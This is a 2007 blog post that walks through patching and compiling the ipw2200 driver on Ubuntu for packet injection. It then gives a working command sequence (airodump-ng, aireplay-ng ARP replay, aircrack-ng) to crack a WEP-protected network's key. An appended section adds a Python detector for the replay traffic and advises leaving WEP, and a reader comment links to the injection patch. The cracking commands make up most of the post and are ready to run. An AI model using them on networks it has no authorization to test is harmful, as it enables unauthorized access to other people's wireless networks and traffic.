Wednesday, September 19, 2007

WEP cracking with ipw2200

I had been planning to buy a Ubiquiti Atheros wireless card for the last few months... but I don't really need that anymore. I can now crack a WEP wireless network with my built-in ipw2200 wireless card, without an external wireless card.

These are the installation steps on my Ubuntu system; yours may differ, but they should work in general if you have the Linux headers installed. If compilation fails with errors about missing header files, install the following packages:


apt-get install build-essential
apt-get install linux-source
apt-get install linux-headers-`uname -r`
apt-get install sharutils

Make sure the core linux-headers are available in /usr/src/linux:

mv /usr/src/linux /usr/src/linux_bak # Back up any existing /usr/src/linux first
ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux
ls -l /usr/src/linux/ # Should not be empty

I downloaded the source code for ipw2200 version 1.2.1 here, ieee80211 version 1.2.17 here and the ipw2200 injection patch for v1.2.1 from here.

Put all the downloaded files in the same directory, cd into that directory in a terminal, and unpack the archives:

shaolinint@slash# tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
shaolinint@slash# tar -xvf ipw2200-*.tgz
shaolinint@slash# tar -xvf ieee80211-*.tgz

Apply the patches:

shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject.patch
shaolinint@slash# patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

Change the ipw2200 Makefile from:

ifndef CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
endif

to

#ifndef CONFIG_IPW2200
EXTERNAL_BUILD=y
CONFIG_IPW2200=m
CONFIG_IPW2200_DEBUG=y
CONFIG_IPW2200_QOS=y
...
#endif



Compile ieee80211 and ipw2200:


shaolinint@slash# cd ieee80211-*
shaolinint@slash# ./remove-old
shaolinint@slash# make
# answer 'y' to all questions
shaolinint@slash# make install

shaolinint@slash# cd ../ipw2200-1.2.1
shaolinint@slash# ./remove-old
# answer 'y' to all questions
shaolinint@slash# make
shaolinint@slash# make install

shaolinint@slash# rmmod ipw2200
shaolinint@slash# modprobe ipw2200 rtap_iface=1

Ready to go (open a different terminal for each command):

ASSUMED:
ESSID = pgxtest
BSSID = 00:11:22:33:44:55
ETH1 MAC = 00:00:11:11:22:22
FFFF-FFFF: dummy key, could be anything

shaolinint@slash# iwconfig eth1 essid pgxtest key FFFF-FFFF mode managed
shaolinint@slash# airodump-ng --channel 11 --bssid 00:11:22:33:44:55 -w airodump -i rtap0
shaolinint@slash# aireplay-ng -3 -x 1000 -b 00:11:22:33:44:55 -h 00:00:11:11:22:22 -i rtap0 eth1
shaolinint@slash# aircrack-ng airodump.ivs
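
From the defender's side, the ARP replay step above (aireplay-ng -3 at up to 1000 packets per second) stands out on the air because WEP has no replay protection: one station re-sends the same encrypted frame, with the same IV and length, at a high rate. The following is an added example, not part of the original post, that flags that pattern in constructed frame records; the record layout, thresholds and function names are assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample records: (timestamp_ms, source_mac, bssid, wep_iv_hex, frame_len).
# This layout is hypothetical; a real sensor would derive it from
# monitor-mode captures of 802.11 data frames.
def make_sample():
    frames = []
    # Normal client: a fresh IV on every frame, modest rate, varied sizes.
    for i in range(40):
        frames.append((10000 + i * 50, "00:aa:bb:cc:dd:01",
                       "00:11:22:33:44:55", f"{0x1000 + i:06x}", 90 + (i % 7) * 40))
    # Replaying station: one captured frame re-sent unchanged, so the IV and
    # length never change while the rate is very high (one frame every 2 ms).
    for i in range(600):
        frames.append((10000 + i * 2, "00:00:11:11:22:22",
                       "00:11:22:33:44:55", "a1b2c3", 68))
    return sorted(frames)


def detect_replay(frames, window_ms=1000, min_repeats=100):
    """Return {source_mac: peak count of one (IV, length) pair in a window}
    for every station whose peak reaches min_repeats."""
    # (mac, bssid, window index) -> Counter of (iv, length) pairs seen
    buckets = defaultdict(Counter)
    for ts_ms, src, bssid, iv, length in frames:
        buckets[(src, bssid, ts_ms // window_ms)][(iv, length)] += 1
    alerts = {}
    for (src, _bssid, _window), counts in buckets.items():
        peak = max(counts.values())
        # Legitimate WEP senders change the IV per frame, so a large count
        # of one identical (IV, length) pair indicates replayed traffic.
        if peak >= min_repeats and peak > alerts.get(src, 0):
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for mac, peak in detect_replay(make_sample()).items():
        print(f"possible WEP replay from {mac}: {peak} identical frames in one window")
```

The threshold needs tuning per network; the durable fix is moving the access point off WEP.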

1 comment:

step said...

I got it from here

http://telefonica.net/web2/wifislax/varios/ipw2200-1.2.1-inject_patch.tar.gz

The existing one has already been removed. The post was back in 2007. I'm a bit too late.